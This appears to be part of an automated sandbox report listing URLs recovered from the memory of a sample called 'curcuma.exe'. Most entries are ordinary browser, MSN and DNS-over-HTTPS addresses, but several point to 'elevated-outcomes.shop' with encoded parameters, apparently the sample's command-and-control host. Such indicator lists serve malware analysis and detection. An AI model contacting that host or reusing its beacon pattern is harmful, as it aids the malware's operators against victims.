Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.nel.cloudflare.com/report/v3?s=0b6Aifh30%2FgfQaQCMOwZ14uQEQ53jYrfzrDCc10FuTOoqrvbxYTjZLXhH
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZEY
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZEpr
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFpk
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alekberg.net/privacy
Source: curcuma.exe, 00000025.00000003.1788725872.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection?placement=88000369&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=e
Source: curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.0818c0a6f8b76d93738b.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jspr
Source: curcuma.exe, 00000025.00000003.1866305004.0000012CDEE2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_experiences-telemetry_dist_object-mapping
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_SportsDataMapper
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jspr
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype
Source: curcuma.exe, 00000025.00000003.1855299077.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout?User=m-0DDB686F4DAE69E20AF07DC74C2A6898&act
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryhttps://deff.nelreports.net/api/reportcat=msn.
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryrp
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryrpP
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryrpPL
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1830154436.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnpr
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1830154436.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportcat=msn.
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations/
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations/
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/cert_verifier.mojom.URLLoaderF
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.google/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query.png
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.switch.ch/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.switch.ch/dns-queryhttps://dns.quad9.net/dns-queryhttps://chromium.dns.nextdns.iohttps:/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edge.activity.windows.com
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1924228697.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1928289376.0000012CDEF6A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051276988.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604701641.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058633835.0000012CDD306000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD303000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD32F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2061133250.0000012CDEF6C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD32F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1985111422.0000012CDEF6E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2009898152.0000012CDD303000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1924422209.0000012CDD2FD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1960385639.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 
00000025.00000003.1985688441.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1973414830.0000012CDD305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/
Source: curcuma.exe, 00000025.00000003.1961312143.0000012CDEE52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw
Source: curcuma.exe, 00000025.00000003.1737873999.0000012CDEE52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cN
Source: curcuma.exe, 00000025.00000003.1961312143.0000012CDEE52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3MwP55
Source: curcuma.exe, 00000025.00000002.2058966823.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/rue
Source: curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443
Source: curcuma.exe, 00000025.00000002.2061133250.0000012CDEF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV
Source: curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443l
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://identity.nel.measure.office.net/api/report?catId=GW
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12rZ8k.img
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12rZ8k.img/service/msn/user?apikey=1hYoJsI
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA163BIW.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA163BIW.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA19HPwx.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8bzM.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8bzM.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8gmh.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8gmh.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdTRDX.img
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAufg2e.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAufg2e.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18CMuA.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA163TNa?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA163TNa?w=80&h=80&q=60&m=6&f=jpg&u=tlast-modified:Sat
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19WLjq?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19WLjq?w=80&h=80&q=60&m=6&f=jpg&u=tlast-modified:Wed
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19Wcee?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19Wcee?w=80&h=80&q=60&m=6&f=jpg&u=tx-source-length:11611
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1a28Ye?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1a28Ye?w=80&h=80&q=60&m=6&f=jpg&u=tx-source-length:97288
Source: curcuma.exe, 00000025.00000003.1841859255.0000012CDEEC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1xc9H0
Source: curcuma.exe, 00000025.00000003.1841859255.0000012CDEEC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1xc9H0Last-Modified:
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AANXkGJ?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AANXkGJ?w=80&h=80&q=60&m=6&f=jpg&u=tx-source-length:111502
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAdTRDX
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1708352966.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://m.adnxs.com/bounce?%2Fmapuid%3Fmember%3D280%26user%3D0DDB686F4DAE69E20AF07DC74C2A6898%3B%26g
Source: curcuma.exe, 00000025.00000003.1788725872.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://msn.com
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nextdns.io/privacy
Source: curcuma.exe, 00000025.00000003.1791060166.0000012CE2C91000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C00000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/
Source: curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/2
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.jspr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: curcuma.exe, 00000025.00000003.1830154436.0000012CE2C67000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNH
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/om
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1830154436.0000012CE2C67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=ed
Source: curcuma.exe, 00000025.00000003.1804074167.0000012CE2C91000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1791060166.0000012CE2C91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comcache-control:public
Source: curcuma.exe, 00000025.00000003.1891540114.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comreport-to
